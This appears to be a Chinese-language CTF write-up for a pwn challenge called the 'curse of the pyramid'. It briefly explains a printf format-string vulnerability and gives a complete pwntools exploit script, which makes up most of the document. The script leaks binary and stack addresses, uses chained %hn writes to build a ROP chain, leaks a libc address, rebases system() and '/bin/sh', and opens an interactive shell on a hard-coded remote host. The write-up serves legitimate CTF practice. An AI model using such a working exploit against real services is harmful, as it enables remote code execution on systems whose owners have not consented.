[分享]咲夜南梦 第三题:金字塔的诅咒 WP

2019-6-12 08:39 203

由于不能直接通过 read 将数据写到栈里,只能利用格式化字符串(printf)漏洞:需要在栈内找到一个指向栈内较近位置的指针 A,并且 A 所指向的位置本身也必须存放一个指向栈内的指针 B。
这样先用 printf 通过第一个指针(代码中的 %5$hn)修改第二个指针 B 的低 2 字节,使 B 指向目标地址;再通过第二个指针(%53$hn)修改 B 所指向的值,即可在栈内局部区域实现每次 2 字节的任意写(%hn 只写 2 字节,因此目标地址只能在同一 64KB 范围内移动)。
exploit.py如下
from pwn import *
# Verbose pwntools I/O logging: every byte sent/received is printed.  Handy
# while tuning stack offsets, very noisy once the exploit works.
context.log_level = "debug"
#sh = process("./format")
# Libc the remote target is assumed to run (glibc 2.23).  Its symbol table is
# used at the end to rebase system() and "/bin/sh" from the leaked
# __libc_start_main address; a wrong libc here yields wrong addresses.
lib = ELF("libc-2.23.so")
# Hard-coded CTF target; swap in the commented-out process() line to run locally.
sh = remote("152.136.18.34",9999)
# Target binary.  Its PLT/GOT offsets are added to a leaked base below, so it
# is treated as position independent.
elf = ELF("format")
# Filled in by the leak helpers below and read by writeByte()/main:
base_addr = 0   # page-aligned load base of ./format
ret_addr = 0    # stack address the ROP chain is written to
ret2addr = 0    # second leaked stack pointer (leaked, but never read by main)
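def getBaseAddress():
    """Leak the binary's load base through the format-string bug.

    Chooses menu option 1, sends ``%3$p`` so printf prints the 3rd stack
    argument as a pointer, parses the 8 hex digits that follow ``0x`` and
    rounds the value down to a page boundary into the module-level
    ``base_addr``.  The 3rd argument is presumably a pointer into the
    binary's own mapping (TODO: confirm against the stack layout); only its
    page is kept.
    """
    global base_addr
    sh.recvuntil("Choice:")
    sh.sendline("1")
    # The prompt typo ("tou") is the target's own output; do not "fix" it.
    sh.recvuntil("What do tou want to say:")
    sh.sendline("%3$p")
    sh.recvuntil("0x")
    # recvn() blocks until all 8 digits have arrived; recv(8) may return a
    # short read on a slow link and silently corrupt the base address.
    leaked = int(sh.recvn(8), 16)
    base_addr = leaked & ~0xFFF  # round down to the 4 KiB page
    log.success("base_addr :" + hex(base_addr))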
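def getRetAddress():
    """Leak a stack pointer and derive where the ROP chain will be written.

    Sends ``%5$p`` to print the 5th stack argument, then applies the deltas
    measured in gdb (see the two ``0xD4`` samples in main): the leaked
    pointer sits 0xD4 bytes above the reference slot, and the chain starts
    60 bytes past that.  Stores the result in the module-level ``ret_addr``.
    """
    global ret_addr
    # Wait for the menu like the other helpers do.  A bare recv() returned
    # whatever happened to be buffered and could race the prompt.
    sh.recvuntil("Choice:")
    sh.sendline("1")
    sh.recvuntil("What do tou want to say:")
    sh.sendline("%5$p")
    sh.recvuntil("0x")
    # Exactly 8 hex digits; recv(8) could return fewer and mis-parse.
    leaked = int(sh.recvn(8), 16)
    ret_addr = (leaked - 0xD4) + 60
    log.success("ret_addr :" + hex(ret_addr))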
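def getRet2Address():
    """Leak the 15th stack argument as a raw pointer into ``ret2addr``.

    Same menu dance as the other leak helpers with ``%15$p``.  The value is
    stored unmodified; main never reads it, so this call is informational
    (it shows up in the debug log only).
    """
    global ret2addr
    # Consistent with getBaseAddress()/inputMsg(): block for the prompt
    # instead of consuming whatever recv() happened to have buffered.
    sh.recvuntil("Choice:")
    sh.sendline("1")
    sh.recvuntil("What do tou want to say:")
    sh.sendline("%15$p")
    sh.recvuntil("0x")
    # Exactly 8 hex digits; recv(8) could return fewer and mis-parse.
    ret2addr = int(sh.recvn(8), 16)
    log.success("ret2addr  :" + hex(ret2addr))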
def inputMsg(msg):
    """Feed one string to the format-string sink behind menu option 1.

    Waits for the menu, selects option 1, waits for the "say:" prompt and
    sends ``msg`` followed by a newline.  Every format-string write in this
    exploit goes through here.
    """
    exchange = (("Choice:", "1"), ("say:", msg))
    for prompt, reply in exchange:
        sh.recvuntil(prompt)
        sh.sendline(reply)
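def _hn_payloads(value, target_low16):
    """Build the two printf payloads that store ``value`` through the pointer chain.

    Step 1 pads the output to ``target_low16`` bytes and ``%5$hn`` stores that
    count into the slot argument 5 points at, so the pointer living in
    argument 53 now points at the target.  Step 2 pads to ``value`` bytes and
    ``%53$hn`` stores it through that redirected pointer.

    A zero count is written with a bare ``%N$hn`` rather than ``%.0d``:
    ``%.0d`` prints nothing only when the int it consumes happens to be 0,
    so the stored count would otherwise depend on whatever sits in the
    first vararg slot.

    Pure helper (no I/O) so the payloads can be unit-tested.

    Args:
        value: 16-bit value to store.
        target_low16: low 16 bits of the destination address.

    Returns:
        A two-element list of format strings, in send order.

    Raises:
        ValueError: if either argument does not fit in 16 bits; ``%hn``
            stores two bytes, so a larger count could never be written.
    """
    for name, n in (("target_low16", target_low16), ("value", value)):
        if not 0 <= n <= 0xFFFF:
            raise ValueError("%s=%#x does not fit in a %%hn write" % (name, n))
    point_at_target = "%5$hn" if target_low16 == 0 else "%." + str(target_low16) + "d%5$hn"
    store_value = "%53$hn" if value == 0 else "%." + str(value) + "d%53$hn"
    return [point_at_target, store_value]


def writeByte(byte,offset):
    """Write the 16-bit value ``byte`` at ``ret_addr + offset`` on the stack.

    Only the low 16 bits of the destination are redirected (``%hn`` stores
    two bytes), which is enough because, per the writeup, the second-level
    pointer already points into the same region of the stack.  Issues the
    two format-string sends via inputMsg().

    Args:
        byte: value to store, 0..0xFFFF (despite the name it is two bytes).
        offset: byte offset from the module-level ``ret_addr``.
    """
    target_low16 = (ret_addr + offset) % 0x10000
    for payload in _hn_payloads(byte, target_low16):
        inputMsg(payload)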
def write2Bytes(bytes,offset):
    """Store a 32-bit value at ``ret_addr + offset`` as two 16-bit writes.

    The low half goes to ``offset`` and the high half to ``offset + 2``.
    Returns the offset of the next free dword so chain entries can be laid
    out back to back.  (The parameter name shadows the ``bytes`` builtin;
    it is kept for caller compatibility.)
    """
    high_half, low_half = divmod(bytes, 0x10000)
    writeByte(low_half, offset)
    writeByte(high_half, offset + 2)
    return offset + 4
if __name__ == '__main__':
    # Two gdb samples of (leaked %5$p pointer) - (stack slot the chain
    # targets): the delta is stable at 0xD4, which getRetAddress() relies on.
    # 0xff889254 - 0xff889180 = 0xD4
    # 0xffc25204 - 0xffc25130 = 0xD4
    # ``global`` at module level is a no-op; harmless leftovers.
    global base_addr
    global ret2addr
    global ret_addr
    pop_ret = 0x00000585  # unused; same gadget as pop_ebx_ret below
    # Three info leaks: binary base, chain address, second stack pointer
    # (ret2addr is never read afterwards).
    getBaseAddress()
    getRetAddress()
    getRet2Address()
    offset = 0;
    # Gadget offsets inside ./format; each is added to base_addr at use.
    pop_ebx_ret = 0x00000585
    pop_ebp_ret = 0x000009eb
    pop3_ret = 0x000009e9
    # ROP chain, written one dword at a time starting at ret_addr.  The
    # number in each comment is the byte offset of that slot from ret_addr.
    offset = write2Bytes(pop_ebx_ret + base_addr,offset)      #  0: pop ebx ; ret
    # 4: value popped into ebx.  Presumably the GOT pointer the PIC PLT stubs
    # expect in ebx before puts/read are called -- TODO confirm in the binary.
    offset = write2Bytes(base_addr + 0x1FB0 , offset)
    offset = write2Bytes(base_addr+elf.plt['puts'],offset)    #  8: puts(got entry)
    offset = write2Bytes(pop_ebp_ret + base_addr,offset)      # 12: puts returns here; pop ebp ; ret skips its argument
    offset = write2Bytes(base_addr+elf.got['__libc_start_main'],offset)  # 16: puts argument -> prints a libc pointer
    offset = write2Bytes(base_addr+elf.plt['read'],offset)    # 20: read(fd, buf, len)
    offset = write2Bytes(pop3_ret+base_addr,offset)           # 24: read returns here -- replaced by the final read (see below)
    offset = write2Bytes(0,offset)                            # 28: read arg 1: fd 0 (stdin)
    # 32: read arg 2: buffer = ret_addr + 24, i.e. the pop3_ret slot above.
    # The 12 bytes sent at the end therefore overwrite slots 24..35 with
    # system / dummy return / "/bin/sh", so read "returns" into system().
    offset = write2Bytes(ret_addr+offset - 8,offset)
    offset = write2Bytes(100,offset)                          # 36: read arg 3: length
    # Menu option 2 makes the vulnerable function return into the chain
    # (presumably the exit choice -- TODO confirm).
    sh.sendline("2")
    sh.recvuntil("Choice:")
    # After the prompt text, the next 4 raw bytes are the puts() output:
    # __libc_start_main's address.
    # NOTE(review): recv(4) may return fewer than 4 bytes on a slow link and
    # u32() would then raise; recvn(4) is the exact-length variant.
    libc = u32(sh.recv(4))
    log.success("libc :" + hex(libc))
    # Earlier hard-coded libc-2.23 offsets, superseded by the symbol lookups.
#    system_addr = libc + 0x24470
#    binsh_addr = libc + 0x16533f
    # Rebase the local libc-2.23.so symbols onto the leaked address.
    system_addr = libc - lib.symbols['__libc_start_main'] + lib.symbols['system']
    binsh_addr = libc - lib.symbols['__libc_start_main'] + next(lib.search("/bin/sh"))
    # Consumed by the read() in the chain: system's address, a dummy return
    # address, and the pointer to "/bin/sh" as system's argument.
    payload = p32(system_addr) + p32(0) + p32(binsh_addr)
    sh.sendline(payload)
    sh.interactive()

